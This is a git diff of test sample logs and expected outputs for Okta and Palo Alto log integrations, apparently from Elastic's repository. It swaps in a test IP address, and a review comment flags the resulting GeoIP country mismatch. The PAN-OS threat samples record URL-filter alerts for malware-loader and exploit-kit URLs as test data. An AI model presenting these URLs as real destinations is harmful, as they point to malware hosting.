Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from 
Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to 
Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in 
ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", "id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -232,7 +230,7 @@ "raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "browser": "FIREFOX" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "outcome": { 
@@ -263,28 +261,27 @@
 {
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Dublin",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -121.919,
- "lat": 37.7201
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 7018,
+ "number": 4837,
 "organization": {
- "name": "AT\u0026T Services, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "user": {
 "full_name": "xxxxxx",
 "id": "00u1abvz4pYqdM8ms4x6"
 },
- "ip": "108.255.197.247"
+ "ip": "175.16.199.1"
 },
 "tags": [
 "preserve_original_event"
@@ -298,7 +295,7 @@
 "xxxxxx"
 ],
 "ip": [
- "108.255.197.247"
+ "175.16.199.1"
 ]
 },
 "client": {
@@ -315,11 +312,11 @@ "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "event": { - "ingested": "2021-06-14T07:17:41.693751400Z", - "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "ingested": "2021-12-09T13:42:54.417355900Z", + "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from 
Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to 
Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in 
ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", "id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -362,7 +359,7 @@ "raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "browser": "FIREFOX" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "outcome": { diff --git a/packages/okta/manifest.yml b/packages/okta/manifest.yml index 347adc28efb..a30e8f399b2 100644 --- a/packages/okta/manifest.yml +++ b/packages/okta/manifest.yml @@ -1,6 +1,6 @@ name: okta title: Okta Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect and parse event logs from Okta API with Elastic Agent. type: integration diff --git a/packages/osquery_manager/changelog.yml b/packages/osquery_manager/changelog.yml index 70df2eb4786..2aae0af04de 100644 --- a/packages/osquery_manager/changelog.yml +++ b/packages/osquery_manager/changelog.yml 
@@ -8,7 +8,7 @@ changes: - description: Update fields and readme with host_users, host_groups, host_processes tables. type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.7.3" changes: - description: Update team owner. @@ -23,7 +23,7 @@ changes: - description: Update ecs.yml to include all `date` and `ip` ECS 1.12.0 fields types. type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.7.0" changes: - description: Update to ECS 1.12.0 diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log index 421c6f796a6..36604b7b0e2 100644 --- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log +++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log 
@@ -31,4 +31,4 @@ Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0
 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log
index b493a709848..a21b1c1c97a 100644
--- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log
+++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log
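Review bot: The added TRAFFIC line swaps the destination address to 175.16.199.1 but leaves the device-reported destination-country field near the end of the record (`dstloc` in the PAN-OS traffic log layout) at `United States`, so the sample now describes a destination whose stated country does not match its address. In the GeoLite2 test database that integration pipeline tests typically rely on, the 175.16.199.0/24 block resolves to China, so any GeoIP enrichment of this address will disagree with the log's own country value; if the pipeline maps both, the expected output for this sample should be checked for that divergence. The Okta sample above shows the same pattern (`ipAddress` 175.16.199.1 alongside a Dublin/California `geographicalContext`), though that hunk begins outside this view. Either pick a test address whose test-database location matches the record's stated country, or accept the divergence deliberately and keep the expected files consistent with it.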
@@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 